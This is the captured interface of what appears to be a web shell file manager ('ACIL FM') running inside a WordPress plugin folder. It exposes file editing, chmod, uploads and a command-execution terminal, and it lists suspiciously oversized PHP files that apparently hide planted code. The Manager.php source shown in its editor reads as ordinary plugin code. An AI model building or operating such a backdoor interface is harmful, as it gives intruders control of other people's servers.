ACIL FM
Dark
Refresh
Current DIR:
/home/mhhtmff/www/site/wp-content/plugins/wpml-string-translation/classes/MO/File
/
home
mhhtmff
www
site
wp-content
plugins
wpml-string-translation
classes
MO
File
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
Builder.php
443 B
chmod
View
DL
Edit
Rename
Delete
FailureHooks.php
3.7 MB
chmod
View
DL
Edit
Rename
Delete
FailureHooksFactory.php
1.04 MB
chmod
View
DL
Edit
Rename
Delete
Generator.php
1.79 MB
chmod
View
DL
Edit
Rename
Delete
makeDir.php
637 B
chmod
View
DL
Edit
Rename
Delete
Manager.php
961 B
chmod
View
DL
Edit
Rename
Delete
ManagerFactory.php
282 B
chmod
View
DL
Edit
Rename
Delete
MOFactory.php
143 B
chmod
View
DL
Edit
Rename
Delete
Edit file: /home/mhhtmff/www/site/wp-content/plugins/wpml-string-translation/classes/MO/File/Manager.php
<?php namespace WPML\ST\MO\File; use GlobIterator; use WPML\Collect\Support\Collection; use WPML\ST\TranslationFile\Domains; use WPML\ST\TranslationFile\StringsRetrieve; use WPML_Language_Records; class Manager extends \WPML\ST\TranslationFile\Manager { public function __construct( StringsRetrieve $strings, Builder $builder, \WP_Filesystem_Direct $filesystem, WPML_Language_Records $language_records, Domains $domains ) { parent::__construct( $strings, $builder, $filesystem, $language_records, $domains ); } /** * @return string */ protected function getFileExtension() { return 'mo'; } /** * @return bool */ public function isPartialFile() { return true; } /** * @return Collection */ protected function getDomains() { return $this->domains->getMODomains(); } /** * @return bool */ public static function hasFiles() { return (bool) ( new GlobIterator( self::getSubdir() . '/*.mo' ) )->count(); } }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply